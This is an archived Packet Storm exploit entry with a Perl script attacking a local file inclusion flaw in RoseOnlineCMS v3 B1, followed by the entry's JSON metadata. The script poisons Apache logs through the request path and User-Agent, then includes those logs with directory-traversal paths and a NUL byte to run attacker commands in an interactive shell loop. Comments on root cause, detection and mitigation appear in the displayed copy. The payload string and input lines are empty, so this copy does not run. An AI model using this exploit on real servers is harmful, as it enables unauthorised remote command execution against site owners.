ID PACKETSTORM:55326
Type packetstorm
Reporter Mahmood_ali
Modified 2007-03-24T00:00:00
Description
`#!/usr/bin/perl
# RoseOnlineCMS v3 B1(op)Local File Inclusion Exploit
# P.Script: http://heanet.dl.sourceforge.net/sourceforge/rosecms/RoseOnlineCMS_v3_B1.rar
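# V.Code:
# $op = !isset($_GET['op']) ? home : $_GET['op'] ;
#
# if (is_file("modules/".$op.".php")) {
# include("modules/".$op.".php");
#
# Root cause: $_GET['op'] reaches include() without any validation; is_file()
# only confirms that the resulting path exists, not that it stays inside modules/.
# Fix: accept only module names from a fixed allow-list before building the path.
#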
use IO::Socket;
use LWP::Simple;
#ripped
# Candidate locations of the Apache access and error logs, written as relative
# directory-traversal strings. One entry is later placed in the `op` query
# parameter of the request to index.php (see the command loop below), so each
# string is a path the vulnerable include() would be asked to open.
#
# Defender notes:
#   - Any of these "../" sequences in an `op=` value in the web access log is a
#     strong indicator of this attack and a reasonable detection signature.
#   - The technique depends on the PHP process being able to read the web
#     server's own logs; restricting log file permissions and setting
#     open_basedir removes that precondition.
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
# Argument check: with fewer than three command-line arguments the script
# prints its usage banner and exits without opening any connection.
if (@ARGV < 3) {
print "
===============================================================
| RoseOnlineCMS v3 B1(op)Local File Inclusion Exploit |
| Mahmood.pl [Victim] / (apachepath) |
| Ex: Gold.pl [Victim] / ../logs/error.log |
| Coded By Mahmood_ali |
===============================================================
";
exit();
}
# Main flow of the proof of concept: a two-stage log-poisoning attack against
# the unvalidated `op` include in RoseOnlineCMS v3 B1.
#
# NOTE(review): this archived copy is not runnable as shown. $CODE is an empty
# string and both `$cmd = ;` assignments have no right-hand side; the missing
# text appears to have been stripped when the page was archived.
#
# Defender notes:
#   - Detection: requests to index.php whose `op` value contains "../" or
#     "%00", and request lines or User-Agent headers carrying script markup.
#   - Mitigation: validate `op` against a fixed allow-list of module names,
#     run a PHP version that rejects NUL bytes in file paths (5.3.4 or later),
#     and keep web-server logs unreadable to the PHP process.

# Positional arguments: target host, application base path, log-path selector.
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
print "Code is injecting in logfiles...\n";
# Stage 1: send a single request that carries $CODE in both the request path
# and the User-Agent header, so that the value ends up in the server's logs.
$CODE="";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "user-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "If not working try another apache path\n\n";
print "[shell] ";$cmd = ;
# Stage 2: repeat until the entered text matches "END". Each pass opens a new
# connection and requests index.php with `op` pointing at a log file.
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
#now include parameter
# The "%00" after the log path is a NUL byte intended to cut off the ".php"
# suffix that the vulnerable code appends before calling include().
print $socket "GET ".$path."index.php?op=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
# Echo the raw HTTP response line by line.
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd = ;
}
`
{"id": "PACKETSTORM:55326", "type": "packetstorm", "bulletinFamily": "exploit", "title": "roc-lfi.txt", "description": "", "published": "2007-03-24T00:00:00", "modified": "2007-03-24T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/55326/roc-lfi.txt.html", "reporter": "Mahmood_ali", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:48", "viewCount": 3, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:22:48", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:48", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/55326/roc-lfi.txt", "sourceData": "`#!/usr/bin/perl \n# RoseOnlineCMS v3 B1(op)Local File Inclusion Exploit \n# P.Script: http://heanet.dl.sourceforge.net/sourceforge/rosecms/RoseOnlineCMS_v3_B1.rar \n# V.Code: \n# $op = !isset($_GET['op']) ? home : $_GET['op'] ; \n# \n# if (is_file(\"modules/\".$op.\".php\")) { \n# include(\"modules/\".$op.\".php\"); \n# \nuse IO::Socket; \nuse LWP::Simple; \n#ripped \n@apache=( \n\"../../../../../var/log/httpd/access_log\", \n\"../../../../../var/log/httpd/error_log\", \n\"../apache/logs/error.log\", \n\"../apache/logs/access.log\", \n\"../../apache/logs/error.log\", \n\"../../apache/logs/access.log\", \n\"../../../apache/logs/error.log\", \n\"../../../apache/logs/access.log\", \n\"../../../../apache/logs/error.log\", \n\"../../../../apache/logs/access.log\", \n\"../../../../../apache/logs/error.log\", \n\"../../../../../apache/logs/access.log\", \n\"../logs/error.log\", \n\"../logs/access.log\", \n\"../../logs/error.log\", \n\"../../logs/access.log\", \n\"../../../logs/error.log\", \n\"../../../logs/access.log\", \n\"../../../../logs/error.log\", \n\"../../../../logs/access.log\", \n\"../../../../../logs/error.log\", \n\"../../../../../logs/access.log\", \n\"../../../../../etc/httpd/logs/access_log\", \n\"../../../../../etc/httpd/logs/access.log\", 
\n\"../../../../../etc/httpd/logs/error_log\", \n\"../../../../../etc/httpd/logs/error.log\", \n\"../../.. /../../var/www/logs/access_log\", \n\"../../../../../var/www/logs/access.log\", \n\"../../../../../usr/local/apache/logs/access_log\", \n\"../../../../../usr/local/apache/logs/access.log\", \n\"../../../../../var/log/apache/access_log\", \n\"../../../../../var/log/apache/access.log\", \n\"../../../../../var/log/access_log\", \n\"../../../../../var/www/logs/error_log\", \n\"../../../../../var/www/logs/error.log\", \n\"../../../../../usr/local/apache/logs/error_log\", \n\"../../../../../usr/local/apache/logs/error.log\", \n\"../../../../../var/log/apache/error_log\", \n\"../../../../../var/log/apache/error.log\", \n\"../../../../../var/log/access_log\", \n\"../../../../../var/log/error_log\" \n); \nif (@ARGV < 3) { \nprint \" \n=============================================================== \n| RoseOnlineCMS v3 B1(op)Local File Inclusion Exploit | \n| Mahmood.pl [Victim] / (apachepath) | \n| Ex: Gold.pl [Victim] / ../logs/error.log | \n| Coded By Mahmood_ali | \n=============================================================== \n\"; \nexit(); \n} \n$host=$ARGV[0]; \n$path=$ARGV[1]; \n$apachepath=$ARGV[2]; \nprint \"Code is injecting in logfiles...\\n\"; \n$CODE=\"\"; \n$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connection failed.\\n\\n\"; \nprint $socket \"GET \".$path.$CODE.\" HTTP/1.1\\r\\n\"; \nprint $socket \"user-Agent: \".$CODE.\"\\r\\n\"; \nprint $socket \"Host: \".$host.\"\\r\\n\"; \nprint $socket \"Connection: close\\r\\n\\r\\n\"; \nclose($socket); \nprint \"Write END to exit!\\n\"; \nprint \"If not working try another apache path\\n\\n\"; \nprint \"[shell] \";$cmd = ; \nwhile($cmd !~ \"END\") { \n$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connection failed.\\n\\n\"; \n#now include parameter \nprint $socket \"GET 
\".$path.\"index.php?op=\".$apache[$apachepath].\"%00&cmd=$cmd HTTP/1.1\\r\\n\"; \nprint $socket \"Host: \".$host.\"\\r\\n\"; \nprint $socket \"Accept: */*\\r\\n\"; \nprint $socket \"Connection: close\\r\\n\\r\\n\"; \nwhile ($raspuns = <$socket>) \n{ \nprint $raspuns; \n} \nprint \"[shell] \"; \n$cmd = ; \n} \n \n`\n"}
{}